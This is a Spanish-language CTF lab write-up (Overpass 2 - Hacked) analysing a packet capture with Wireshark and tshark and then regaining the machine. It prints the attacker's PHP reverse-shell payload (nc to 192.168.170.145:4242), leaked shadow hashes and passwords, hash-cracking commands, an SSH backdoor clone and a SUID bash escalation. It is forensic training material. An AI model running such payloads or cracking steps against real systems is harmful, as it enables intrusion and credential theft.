🧑🔬OVERPASS 2 - HACKEADO
1. Análisis forense:
Se abre Wireshark y se carga el archivo de captura (overpass2.pcapng).
Se filtran los paquetes por protocolo HTTP.
Se busca la ruta "/development/upload.php".
Se analiza la carga útil del archivo payload.php para ver cómo se ejecutó el comando del shell inverso.
Tambien filtarmos con busqueda de filtros con TSHARK:
tshark -r overpass2.pcapng -x | strings | grep -A 5 ".php"tshark -r overpass2.pcapng -T fields -e data | xxd -r -p | stringsCarga útil del archivo payload.php:
PHP
<?php
exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f");
?>2. Escalada de privilegios:
Se busca en la captura de Wireshark el comando "sudo".
Se observa la contraseña "siemprequenoteartinstant" utilizada por el atacante para ejecutar el comando con privilegios de superusuario.
su james3. Persistencia:
Se busca en la captura de Wireshark el comando "git clone".
Se observa que el atacante clonó el repositorio de GitHub "https://github.com/NinjaJc01/ssh-backdoor".
4. Obtención de acceso:
Se descifran 4 contraseñas de 5 usarios que el atacante vio en /etc/shadow , y usamos John the Ripper y una lista de palabras.
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt --pot=results_james.txt passwdjame.txtSe descifra el hash de la puerta trasera SSH utilizando hashcat, pero primero guardamos el Hash que uso el atacante al ejecutar ssh Backdoor mas el salt que contiene el script este, en el archivo se gurada asi: hash:salt.
┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# cat hashlistoparajondos.txt
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:1c362db832f3f864c8c2fe05f2002a05Se utiliza ssh para conectarse al sistema con la cuenta de "James" y la contraseña "november16".
Comando para descifrar el hash de la puerta trasera SSH:
hashcat -a 0 -m 1710 hashlistoparajondos.txt /usr/share/wordlists/rockyou.txt5. Elevación de privilegios:
Se ejecuta el archivo ".suid_bash" con la bandera "-p" para obtener privilegios de root, este parametro lo encontramos en las opciones del script suid_bash poniendo un -j o -h erroneo nos dio las opciones de parametro que tenia, y el -p decia que dejaba acceder al script con bit suid de ROOt a todas las rutas del $PATH por ende podriamos ejcutar ya asi cualquier comando como ROOT y se tenzo.
Comando para obtener privilegios de root:
./.suid_bash -pResultado:
Se recupera el control del sistema y se obtiene la bandera del usuario y ROOT.
// Some code
PENTESTING OFENSIVO:
Paso elevado 2 - Hackeado :
DESCARGAMOS EL ARCHIVO .PCAP DONDE SE CAPTURO ANALISANDO LA RED DURANTE EL ATAQUE QUE RESIVIMOS, Y LUEGO VERIFICAMOS LA INTEGRIDAD DEL ARCHIVO CON MD5SUM Y PERFECTO:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# md5sum overpass2.pcapng
11c3b2e9221865580295bc662c35c6dc overpass2.pcapng
--------------------------- WIRESHARK ------------------------------
ANALIZANDO EL ARCHIVO RASANTEMNTE VEMOS YA ESTA INFORMACION RAPIDAMENTE, COMO QUE SE SOLICITO UNA SUBIDA DE ARCHIVO DESDE LA (atacante)IP : 192.168.170.145 A NUESTRO SERVIDOR (victima)IP: 192.168.170.159 CON UNA SOLITUD CON METODO GET A LA RUTA /development/uploads/payload.php :
PAQUETE DE PAYLOAD:
Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159
Transmission Control Protocol, Src Port: 47736, Dst Port: 80, Seq: 1, Ack: 1, Len: 400
Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
http://192.168.170.159/development/uploads/payload.php
0000 00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00 ..)n....)..H..E.
0010 01 c4 51 81 40 00 40 06 11 31 c0 a8 aa 91 c0 a8 ..Q.@.@..1......
0020 aa 9f ba 78 00 50 e0 79 05 4f c6 62 99 6d 80 18 ...x.P.y.O.b.m..
0030 01 f6 59 5e 00 00 01 01 08 0a c2 13 f6 dc 35 50 ..Y^..........5P
0040 7d 77 47 45 54 20 2f 64 65 76 65 6c 6f 70 6d 65 }wGET /developme
0050 6e 74 2f 75 70 6c 6f 61 64 73 2f 70 61 79 6c 6f nt/uploads/paylo
0060 61 64 2e 70 68 70 20 48 54 54 50 2f 31 2e 31 0d ad.php HTTP/1.1.
0070 0a 48 6f 73 74 3a 20 31 39 32 2e 31 36 38 2e 31 .Host: 192.168.1
0080 37 30 2e 31 35 39 0d 0a 55 73 65 72 2d 41 67 65 70.159..User-Age
0090 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 nt: Mozilla/5.0
00a0 28 58 31 31 3b 20 4c 69 6e 75 78 20 78 38 36 5f (X11; Linux x86_
00b0 36 34 3b 20 72 76 3a 36 38 2e 30 29 20 47 65 63 64; rv:68.0) Gec
00c0 6b 6f 2f 32 30 31 30 30 31 30 31 20 46 69 72 65 ko/20100101 Fire
00d0 66 6f 78 2f 36 38 2e 30 0d 0a 41 63 63 65 70 74 fox/68.0..Accept
00e0 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c : text/html,appl
00f0 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d ication/xhtml+xm
0100 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d l,application/xm
0110 6c 3b 71 3d 30 2e 39 2c 2a 2f 2a 3b 71 3d 30 2e l;q=0.9,*/*;q=0.
0120 38 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 75 61 8..Accept-Langua
0130 67 65 3a 20 65 6e 2d 55 53 2c 65 6e 3b 71 3d 30 ge: en-US,en;q=0
0140 2e 35 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 .5..Accept-Encod
0150 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 ing: gzip, defla
0160 74 65 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74 te..Referer: htt
0170 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 37 30 2e p://192.168.170.
0180 31 35 39 2f 64 65 76 65 6c 6f 70 6d 65 6e 74 2f 159/development/
0190 75 70 6c 6f 61 64 73 2f 0d 0a 43 6f 6e 6e 65 63 uploads/..Connec
01a0 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 tion: keep-alive
01b0 0d 0a 55 70 67 72 61 64 65 2d 49 6e 73 65 63 75 ..Upgrade-Insecu
01c0 72 65 2d 52 65 71 75 65 73 74 73 3a 20 31 0d 0a re-Requests: 1..
01d0 0d 0a ..
PAQUETE DE TRANSMISICION DE LA REVERSE SHELL, VEMOS QUE SOLICITO Y LE MANDAMOS EL CAT de /ETC/PASSWD Y TAMBIEN DETECTAMOS YA QUE SU REVERSE SHELL ESTA LISTANDO POR EL PUERTO 4242 De LA IP ATACANTE, y SALEN LAS RESPUESTAS DE NUESTRO PUERTO 57680:
Internet Protocol Version 4, Src: 192.168.170.159, Dst: 192.168.170.145
Transmission Control Protocol, Src Port: 57680, Dst Port: 4242, Seq: 1543, Ack: 171, Len: 1462
0000 00 0c 29 17 ba 48 00 0c 29 6e 18 17 08 00 45 00 ..)..H..)n....E.
0010 05 ea ae bd 40 00 40 06 af ce c0 a8 aa 9f c0 a8 ....@.@.........
0020 aa 91 e1 50 10 92 09 61 b5 64 67 a7 d5 31 80 18 ...P...a.dg..1..
0030 01 f6 dc 5e 00 00 01 01 08 0a 35 51 84 97 c2 14 ...^......5Q....
0040 fd f8 72 6f 6f 74 3a 2a 3a 31 38 32 39 35 3a 30 ..root:*:18295:0
0050 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 64 61 65 :99999:7:::..dae
0060 6d 6f 6e 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 mon:*:18295:0:99
0070 39 39 39 3a 37 3a 3a 3a 0d 0a 62 69 6e 3a 2a 3a 999:7:::..bin:*:
0080 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 18295:0:99999:7:
0090 3a 3a 0d 0a 73 79 73 3a 2a 3a 31 38 32 39 35 3a ::..sys:*:18295:
00a0 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73 79 0:99999:7:::..sy
00b0 6e 63 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 nc:*:18295:0:999
00c0 39 39 3a 37 3a 3a 3a 0d 0a 67 61 6d 65 73 3a 2a 99:7:::..games:*
00d0 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 :18295:0:99999:7
00e0 3a 3a 3a 0d 0a 6d 61 6e 3a 2a 3a 31 38 32 39 35 :::..man:*:18295
00f0 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 6c :0:99999:7:::..l
0100 70 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 p:*:18295:0:9999
0110 39 3a 37 3a 3a 3a 0d 0a 6d 61 69 6c 3a 2a 3a 31 9:7:::..mail:*:1
0120 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 8295:0:99999:7::
0130 3a 0d 0a 6e 65 77 73 3a 2a 3a 31 38 32 39 35 3a :..news:*:18295:
0140 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 75 75 0:99999:7:::..uu
0150 63 70 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 cp:*:18295:0:999
0160 39 39 3a 37 3a 3a 3a 0d 0a 70 72 6f 78 79 3a 2a 99:7:::..proxy:*
0170 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 :18295:0:99999:7
0180 3a 3a 3a 0d 0a 77 77 77 2d 64 61 74 61 3a 2a 3a :::..www-data:*:
0190 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 18295:0:99999:7:
01a0 3a 3a 0d 0a 62 61 63 6b 75 70 3a 2a 3a 31 38 32 ::..backup:*:182
01b0 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 95:0:99999:7:::.
01c0 0a 6c 69 73 74 3a 2a 3a 31 38 32 39 35 3a 30 3a .list:*:18295:0:
01d0 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 69 72 63 3a 99999:7:::..irc:
01e0 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a *:18295:0:99999:
01f0 37 3a 3a 3a 0d 0a 67 6e 61 74 73 3a 2a 3a 31 38 7:::..gnats:*:18
0200 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 295:0:99999:7:::
0210 0d 0a 6e 6f 62 6f 64 79 3a 2a 3a 31 38 32 39 35 ..nobody:*:18295
0220 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73 :0:99999:7:::..s
0230 79 73 74 65 6d 64 2d 6e 65 74 77 6f 72 6b 3a 2a ystemd-network:*
0240 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 :18295:0:99999:7
0250 3a 3a 3a 0d 0a 73 79 73 74 65 6d 64 2d 72 65 73 :::..systemd-res
0260 6f 6c 76 65 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 olve:*:18295:0:9
0270 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73 79 73 6c 6f 9999:7:::..syslo
0280 67 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 g:*:18295:0:9999
0290 39 3a 37 3a 3a 3a 0d 0a 6d 65 73 73 61 67 65 62 9:7:::..messageb
02a0 75 73 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 us:*:18295:0:999
02b0 39 39 3a 37 3a 3a 3a 0d 0a 5f 61 70 74 3a 2a 3a 99:7:::.._apt:*:
02c0 31 38 32 39 35 3a 30 3a 39 39 39 39 39 3a 37 3a 18295:0:99999:7:
02d0 3a 3a 0d 0a 6c 78 64 3a 2a 3a 31 38 32 39 35 3a ::..lxd:*:18295:
02e0 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 75 75 0:99999:7:::..uu
02f0 69 64 64 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 idd:*:18295:0:99
0300 39 39 39 3a 37 3a 3a 3a 0d 0a 64 6e 73 6d 61 73 999:7:::..dnsmas
0310 71 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 q:*:18295:0:9999
0320 39 3a 37 3a 3a 3a 0d 0a 6c 61 6e 64 73 63 61 70 9:7:::..landscap
0330 65 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 e:*:18295:0:9999
0340 39 3a 37 3a 3a 3a 0d 0a 70 6f 6c 6c 69 6e 61 74 9:7:::..pollinat
0350 65 3a 2a 3a 31 38 32 39 35 3a 30 3a 39 39 39 39 e:*:18295:0:9999
0360 39 3a 37 3a 3a 3a 0d 0a 73 73 68 64 3a 2a 3a 31 9:7:::..sshd:*:1
0370 38 34 36 34 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 8464:0:99999:7::
0380 3a 0d 0a 6a 61 6d 65 73 3a 24 36 24 37 47 53 35 :..james:$6$7GS5
0390 65 2e 79 76 24 48 71 49 48 35 4d 74 68 70 47 57 e.yv$HqIH5MthpGW
03a0 70 63 7a 72 33 4d 6e 77 44 48 6c 45 44 38 67 62 pczr3MnwDHlED8gb
03b0 56 53 48 74 37 6d 61 38 79 78 7a 42 4d 38 4c 75 VSHt7ma8yxzBM8Lu
03c0 42 52 65 44 56 35 65 31 50 75 2f 56 75 52 73 6b BReDV5e1Pu/VuRsk
03d0 75 67 74 31 43 6b 75 6c 2f 53 4b 47 58 2e 35 50 ugt1Ckul/SKGX.5P
03e0 79 4d 70 7a 41 59 6f 33 43 67 2f 3a 31 38 34 36 yMpzAYo3Cg/:1846
03f0 34 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 4:0:99999:7:::..
0400 70 61 72 61 64 6f 78 3a 24 36 24 6f 52 58 51 75 paradox:$6$oRXQu
0410 34 33 58 24 57 61 41 6a 33 5a 2f 34 73 45 50 56 43X$WaAj3Z/4sEPV
0420 31 6d 4a 64 48 73 79 4a 6b 49 5a 6d 31 72 6a 6a 1mJdHsyJkIZm1rjj
0430 6e 4e 78 72 59 35 63 38 47 45 6c 4a 49 6a 47 37 nNxrY5c8GElJIjG7
0440 75 33 36 78 53 67 4d 47 77 4b 41 32 77 6f 44 49 u36xSgMGwKA2woDI
0450 46 75 64 74 79 71 59 33 37 59 43 79 75 6b 69 48 FudtyqY37YCyukiH
0460 4a 50 68 69 34 49 55 37 48 30 3a 31 38 34 36 34 JPhi4IU7H0:18464
0470 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 73 :0:99999:7:::..s
0480 7a 79 6d 65 78 3a 24 36 24 42 2e 45 6e 75 58 69 zymex:$6$B.EnuXi
0490 4f 24 66 2f 75 30 30 48 6f 73 5a 49 4f 33 55 51 O$f/u00HosZIO3UQ
04a0 43 45 4a 70 6c 61 7a 6f 51 74 48 38 57 4a 6a 53 CEJplazoQtH8WJjS
04b0 58 2f 6f 6f 42 6a 77 6d 59 66 45 4f 54 63 71 43 X/ooBjwmYfEOTcqC
04c0 41 6c 4d 6a 65 46 49 67 59 57 71 52 35 41 6a 32 AlMjeFIgYWqR5Aj2
04d0 76 73 66 52 79 66 36 78 31 77 58 78 4b 69 74 63 vsfRyf6x1wXxKitc
04e0 50 55 6a 63 58 6c 58 2f 3a 31 38 34 36 34 3a 30 PUjcXlX/:18464:0
04f0 3a 39 39 39 39 39 3a 37 3a 3a 3a 0d 0a 62 65 65 :99999:7:::..bee
0500 3a 24 36 24 2e 53 71 48 72 70 36 7a 24 42 34 72 :$6$.SqHrp6z$B4r
0510 57 50 69 30 48 6b 6a 30 67 62 51 4d 46 75 6a 7a WPi0Hkj0gbQMFujz
0520 31 4b 48 56 73 39 56 72 53 46 75 37 41 55 39 43 1KHVs9VrSFu7AU9C
0530 78 57 72 5a 56 37 47 7a 48 30 35 74 59 50 4c 31 xWrZV7GzH05tYPL1
0540 78 52 7a 55 4a 6c 46 48 62 79 70 30 4b 39 54 41 xRzUJlFHbyp0K9TA
0550 65 59 31 4d 36 6e 69 46 73 65 42 39 56 4c 42 57 eY1M6niFseB9VLBW
0560 53 6f 30 3a 31 38 34 36 34 3a 30 3a 39 39 39 39 So0:18464:0:9999
0570 39 3a 37 3a 3a 3a 0d 0a 6d 75 69 72 6c 61 6e 64 9:7:::..muirland
0580 3a 24 36 24 53 57 79 62 53 38 6f 32 24 39 64 69 :$6$SWybS8o2$9di
0590 76 65 51 69 6e 78 79 38 50 4a 51 6e 47 51 51 57 veQinxy8PJQnGQQW
05a0 62 54 4e 4b 65 62 32 41 69 53 70 2e 69 38 4b 7a bTNKeb2AiSp.i8Kz
05b0 6e 75 41 6a 59 62 71 49 33 71 30 34 52 66 35 68 nuAjYbqI3q04Rf5h
05c0 6a 48 50 65 72 33 77 65 69 43 2e 32 4d 72 4f 6a jHPer3weiC.2MrOj
05d0 32 6f 31 53 77 2f 66 64 32 63 75 30 6b 43 36 64 2o1Sw/fd2cu0kC6d
05e0 55 50 2e 3a 31 38 34 36 34 3a 30 3a 39 39 39 39 UP.:18464:0:9999
05f0 39 3a 37 3a 3a 3a 0d 0a 9:7:::..
VEMOS TAMBIEN EL ENCABEZADO DE TERMINALl AL QUE SE CONECTO A NUESTRO SERVIDOR LA REVERSESHELL DEL ATACANTE Y VEMOS EL USUARIO DEL QUE TOMO DOMINIO JAMES DE LA MAQUINA EMPRSA OVERPASS:
Internet Protocol Version 4, Src: 192.168.170.159, Dst: 192.168.170.145
Transmission Control Protocol, Src Port: 57680, Dst Port: 4242, Seq: 3005, Ack: 171, Len: 29
0000 00 0c 29 17 ba 48 00 0c 29 6e 18 17 08 00 45 00 ..)..H..)n....E.
0010 00 51 ae bf 40 00 40 06 b5 65 c0 a8 aa 9f c0 a8 .Q..@.@..e......
0020 aa 91 e1 50 10 92 09 61 bb 1a 67 a7 d5 31 80 18 ...P...a..g..1..
0030 01 f6 4f 91 00 00 01 01 08 0a 35 51 84 97 c2 14 ..O.......5Q....
0040 fd fc 6a 61 6d 65 73 40 6f 76 65 72 70 61 73 73 ..james@overpass
0050 2d 70 72 6f 64 75 63 74 69 6f 6e 3a 7e 24 20 -production:~$
VEMOS TAMBIEN QUE NOS SOLICITO CLONAR EN GITHUB UN REPOD E UN SSH-BACKDOORS EN NUESTRA MAQUINA VICTIMA (git clone https://github.com/NinjaJc01/ssh-backdoor):
Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159
Transmission Control Protocol, Src Port: 4242, Dst Port: 57680, Seq: 171, Ack: 3034, Len: 52
0000 00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00 ..)n....)..H..E.
0010 00 68 77 75 40 00 40 06 ec 98 c0 a8 aa 91 c0 a8 .hwu@.@.........
0020 aa 9f 10 92 e1 50 67 a7 d5 31 09 61 bb 37 80 18 .....Pg..1.a.7..
0030 01 f5 2a 8b 00 00 01 01 08 0a c2 15 86 21 35 51 ..*..........!5Q
0040 84 97 67 69 74 20 63 6c 6f 6e 65 20 68 74 74 70 ..git clone http
0050 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4e s://github.com/N
0060 69 6e 6a 61 4a 63 30 31 2f 73 73 68 2d 62 61 63 injaJc01/ssh-bac
0070 6b 64 6f 6f 72 0a kdoor.
------------------------------ TSHARK -----------------------------
BIEN A GRANSES RASGOS YA VIMOS INFORMACION; PERO DEBEMOS ANALIZARLO MAS COMODO Y RAPIDO Y LO VAMOS A HACER CREO CON TSHARK FILTRANDO CON PIPELINE Y GREP:
LEEMOS EL ARCHIVO EN BRUTO:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng
Running as user "root" and group "root". This could be dangerous.
1 0.000000000 192.168.170.145 → 192.168.170.159 TCP 74 47732 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=3256059711 TSecr=0 WS=128
2 0.000122542 192.168.170.159 → 192.168.170.145 TCP 74 80 → 47732 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=894438874 TSecr=3256059711 WS=128
3 0.000211854 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=3256059711 TSecr=894438874
4 0.000326676 192.168.170.145 → 192.168.170.159 HTTP 484 GET /development/ HTTP/1.1
5 0.000342046 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47732 [ACK] Seq=1 Ack=419 Win=64768 Len=0 TSval=894438874 TSecr=3256059711
6 0.000860947 192.168.170.159 → 192.168.170.145 HTTP 1078 HTTP/1.1 200 OK (text/html)
7 0.000863357 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [ACK] Seq=419 Ack=1013 Win=64128 Len=0 TSval=3256059712 TSecr=894438875
8 5.002042815 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [FIN, ACK] Seq=419 Ack=1013 Win=64128 Len=0 TSval=3256064713 TSecr=894438875
9 5.002197308 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47732 [FIN, ACK] Seq=1013 Ack=420 Win=64768 Len=0 TSval=894443876 TSecr=3256064713
10 5.002289760 192.168.170.145 → 192.168.170.159 TCP 66 47732 → 80 [ACK] Seq=420 Ack=1014 Win=64128 Len=0 TSval=3256064713 TSecr=894443876
11 7.915625379 192.168.170.145 → 192.168.170.159 TCP 74 47734 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=3256067626 TSecr=0 WS=128
12 7.915783662 192.168.170.159 → 192.168.170.145 TCP 74 80 → 47734 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=894446790 TSecr=3256067626 WS=128
13 7.915903135 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=3256067627 TSecr=894446790
14 7.915992166 192.168.170.145 → 192.168.170.159 HTTP 1026 POST /development/upload.php HTTP/1.1 (application/x-php)
15 7.916108038 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47734 [ACK] Seq=1 Ack=961 Win=64256 Len=0 TSval=894446790 TSecr=3256067627
16 7.916964256 192.168.170.159 → 192.168.170.145 HTTP 309 HTTP/1.1 200 OK (text/html)
17 7.916975776 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=961 Ack=244 Win=64128 Len=0 TSval=3256067628 TSecr=894446791
18 11.984825193 192.168.170.145 → 192.168.170.159 HTTP 401 GET /development/uploads/ HTTP/1.1
19 11.985407246 192.168.170.159 → 192.168.170.145 HTTP 788 HTTP/1.1 200 OK (text/html)
20 11.985492397 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=1296 Ack=966 Win=64128 Len=0 TSval=3256071696 TSecr=894450859
21 16.986459371 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [FIN, ACK] Seq=1296 Ack=966 Win=64128 Len=0 TSval=3256076697 TSecr=894450859
22 16.986574454 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47734 [FIN, ACK] Seq=966 Ack=1297 Win=64128 Len=0 TSval=894455860 TSecr=3256076697
23 16.986655155 192.168.170.145 → 192.168.170.159 TCP 66 47734 → 80 [ACK] Seq=1297 Ack=967 Win=64128 Len=0 TSval=3256076697 TSecr=894455860
24 28.573920433 192.168.170.145 → 192.168.170.159 TCP 74 47736 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=3256088284 TSecr=0 WS=128
25 28.574038675 192.168.170.159 → 192.168.170.145 TCP 74 80 → 47736 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=894467447 TSecr=3256088284 WS=128
26 28.574114977 192.168.170.145 → 192.168.170.159 TCP 66 47736 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=3256088284 TSecr=894467447
27 28.574178738 192.168.170.145 → 192.168.170.159 HTTP 466 GET /development/uploads/payload.php HTTP/1.1
28 28.574306231 192.168.170.159 → 192.168.170.145 TCP 66 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894467448 TSecr=3256088284
29 28.577587788 192.168.170.159 → 192.168.170.145 TCP 74 57680 → 4242 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=894467451 TSecr=0 WS=128
30 28.577592188 192.168.170.145 → 192.168.170.159 TCP 74 4242 → 57680 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0 MSS=1460 SACK_PERM TSval=3256088288 TSecr=894467451 WS=128
31 28.577678110 192.168.170.159 → 192.168.170.145 TCP 66 57680 → 4242 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=894467451 TSecr=3256088288
32 28.577728691 192.168.170.159 → 192.168.170.145 TCP 121 57680 → 4242 [PSH, ACK] Seq=1 Ack=1 Win=64256 Len=55 TSval=894467451 TSecr=3256088288
33 28.577735721 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=1 Ack=56 Win=65152 Len=0 TSval=3256088288 TSecr=894467451
34 38.757749641 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256098468 TSecr=894467448
35 38.757894444 192.168.170.159 → 192.168.170.145 TCP 66 [TCP Keep-Alive ACK] 80 → 47736 [ACK] Seq=1 Ack=401 Win=64768 Len=0 TSval=894477631 TSecr=3256088284
36 39.323816051 192.168.170.145 → 192.168.170.159 TCP 69 4242 → 57680 [PSH, ACK] Seq=1 Ack=56 Win=65152 Len=3 TSval=3256099034 TSecr=894467451
37 39.323916393 192.168.170.159 → 192.168.170.145 TCP 66 57680 → 4242 [ACK] Seq=56 Ack=4 Win=64256 Len=0 TSval=894478197 TSecr=3256099034
38 39.325002015 192.168.170.159 → 192.168.170.145 TCP 120 57680 → 4242 [PSH, ACK] Seq=56 Ack=4 Win=64256 Len=54 TSval=894478198 TSecr=3256099034
39 39.325065907 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=4 Ack=110 Win=65152 Len=0 TSval=3256099035 TSecr=894478198
40 39.325194169 192.168.170.159 → 192.168.170.145 TCP 68 57680 → 4242 [PSH, ACK] Seq=110 Ack=4 Win=64256 Len=2 TSval=894478198 TSecr=3256099035
41 39.325239331 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=4 Ack=112 Win=65152 Len=0 TSval=3256099035 TSecr=894478198
42 40.710537987 192.168.170.138 → 192.168.170.254 DHCP 338 DHCP Request - Transaction ID 0xdf5ef3a7
43 40.710799752 192.168.170.254 → 192.168.170.138 DHCP 342 DHCP ACK - Transaction ID 0xdf5ef3a7
44 44.659136740 192.168.170.145 → 192.168.170.159 TCP 113 4242 → 57680 [PSH, ACK] Seq=4 Ack=112 Win=65152 Len=47 TSval=3256104369 TSecr=894478198
45 44.677577863 192.168.170.159 → 192.168.170.145 TCP 130 57680 → 4242 [PSH, ACK] Seq=112 Ack=51 Win=64256 Len=64 TSval=894483551 TSecr=3256104369
46 44.677585633 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=51 Ack=176 Win=65152 Len=0 TSval=3256104388 TSecr=894483551
47 45.883299798 VMware_82:6c:a5 → VMware_e5:1f:cc ARP 42 Who has 192.168.170.254? Tell 192.168.170.138
48 45.883412361 VMware_e5:1f:cc → VMware_82:6c:a5 ARP 60 192.168.170.254 is at 00:50:56:e5:1f:cc
49 48.593184369 192.168.170.145 → 192.168.170.159 TCP 74 4242 → 57680 [PSH, ACK] Seq=51 Ack=176 Win=65152 Len=8 TSval=3256108303 TSecr=894483551
50 48.593672339 192.168.170.159 → 192.168.170.145 TCP 75 57680 → 4242 [PSH, ACK] Seq=176 Ack=59 Win=64256 Len=9 TSval=894487467 TSecr=3256108303
51 48.593744170 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=185 Win=65152 Len=0 TSval=3256108304 TSecr=894487467
52 48.594671419 192.168.170.159 → 192.168.170.145 TCP 78 57680 → 4242 [PSH, ACK] Seq=185 Ack=59 Win=64256 Len=12 TSval=894487468 TSecr=3256108304
53 48.594685199 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=197 Win=65152 Len=0 TSval=3256108305 TSecr=894487468
54 48.594748890 192.168.170.159 → 192.168.170.145 TCP 184 57680 → 4242 [PSH, ACK] Seq=197 Ack=59 Win=64256 Len=118 TSval=894487468 TSecr=3256108305
55 48.594807082 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=315 Win=65152 Len=0 TSval=3256108305 TSecr=894487468
56 48.595037346 192.168.170.159 → 192.168.170.145 TCP 130 57680 → 4242 [PSH, ACK] Seq=315 Ack=59 Win=64256 Len=64 TSval=894487468 TSecr=3256108305
57 48.595043106 192.168.170.145 → 192.168.170.159 TCP 66 4242 → 57680 [ACK] Seq=59 Ack=379 Win=65152 Len=0 TSval=3256108305 TSecr=894487468
58 48.997256109 192.168.170.145 → 192.168.170.159 TCP 66 [TCP Keep-Alive] 47736 → 80 [ACK] Seq=400 Ack=1 Win=64256 Len=0 TSval=3256108707 TSecr=894477631
